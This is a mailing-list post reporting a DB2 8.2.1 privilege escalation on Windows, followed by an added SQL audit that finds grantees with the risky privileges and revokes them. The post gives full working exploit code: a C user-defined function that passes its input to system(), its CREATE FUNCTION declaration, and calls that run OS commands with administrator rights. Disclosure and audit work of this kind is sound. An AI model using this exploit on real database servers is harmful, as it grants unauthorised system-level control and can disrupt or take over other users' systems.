Hello.
v8.2.1, Windows.
I have a default installation on Windows where the instance owner has
administrative rights in the system.
In this case a user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
    SQLUDF_VARCHAR *command,      /* input */
    SQLUDF_INTEGER *result,       /* output */
    /* null indicators */
    SQLUDF_NULLIND *command_ind,
    SQLUDF_NULLIND *result_ind,
    SQLUDF_TRAIL_ARGS)
{
    int rc = 0;

    /* execute the command */
    rc = system(command);

    *result_ind = 0;
    *result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
    RETURNS INTEGER
    SPECIFIC systemCall
    EXTERNAL NAME 'os_call!systemCall'
    LANGUAGE C
    PARAMETER STYLE SQL
    DETERMINISTIC
    FENCED
    RETURNS NULL ON NULL INPUT
    NO SQL
    EXTERNAL ACTION
    NO SCRATCHPAD
    DISALLOW PARALLEL;
--- udf declaration end ---
And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values systemCall('any_os_command_that_will_be_run_under_administrative_account')
For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.
What do you think about this?
Sincerely,
Mark B.
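
An audit for the privilege combination described in the post above, as an added example that is not part of the original message: it lists non-DBADM grantees who hold CREATE_EXTERNAL_ROUTINE together with IMPLICIT_SCHEMA or CREATEIN, then the external C routines already registered. It assumes the DB2 8.2 catalog views SYSCAT.DBAUTH, SYSCAT.SCHEMAAUTH and SYSCAT.ROUTINES; APPUSER is a hypothetical grantee name.

```sql
-- Added audit example (not from the original post).
-- 1. Grantees holding CREATE_EXTERNAL_ROUTINE plus a way to create
--    objects in some schema: IMPLICIT_SCHEMA (direct or via PUBLIC)
--    or CREATEIN on a schema (direct or via PUBLIC).
SELECT DISTINCT
       d.GRANTEE,
       d.GRANTEETYPE,                 -- 'U' = user, 'G' = group
       CASE WHEN d.IMPLSCHEMAAUTH = 'Y' THEN 'IMPLICIT_SCHEMA (direct)'
            WHEN p.GRANTEE IS NOT NULL  THEN 'IMPLICIT_SCHEMA (via PUBLIC)'
            ELSE 'CREATEIN on ' || s.SCHEMANAME
       END AS SCHEMA_ACCESS
FROM   SYSCAT.DBAUTH d
LEFT JOIN SYSCAT.DBAUTH p
       ON  p.GRANTEE = 'PUBLIC'
       AND p.IMPLSCHEMAAUTH = 'Y'
LEFT JOIN SYSCAT.SCHEMAAUTH s
       ON  s.GRANTEE IN (d.GRANTEE, 'PUBLIC')
       AND s.CREATEINAUTH IN ('Y', 'G')   -- 'G' = held with GRANT option
WHERE  d.EXTERNALROUTINEAUTH = 'Y'
  AND  d.DBADMAUTH = 'N'                  -- DBADM holders are reviewed separately
  AND (d.IMPLSCHEMAAUTH = 'Y'
       OR p.GRANTEE IS NOT NULL
       OR s.GRANTEE IS NOT NULL)
ORDER BY d.GRANTEE;

-- 2. External C routines already registered, newest first.
--    IMPLEMENTATION is the 'library!entry_point' string from EXTERNAL NAME.
SELECT ROUTINESCHEMA,
       ROUTINENAME,
       SPECIFICNAME,
       DEFINER,
       IMPLEMENTATION,
       FENCED,
       CREATE_TIME
FROM   SYSCAT.ROUTINES
WHERE  ORIGIN   = 'E'                     -- user-defined external routine
  AND  LANGUAGE = 'C'
ORDER BY CREATE_TIME DESC;

-- 3. Remove the authority from a grantee that does not need it.
--    APPUSER is a hypothetical name; substitute a grantee from query 1.
REVOKE CREATE_EXTERNAL_ROUTINE ON DATABASE FROM USER APPUSER;
```

Rows with GRANTEETYPE 'G' cover every member of that operating-system group, and group membership is not recorded in the catalog, so it has to be checked on the OS side.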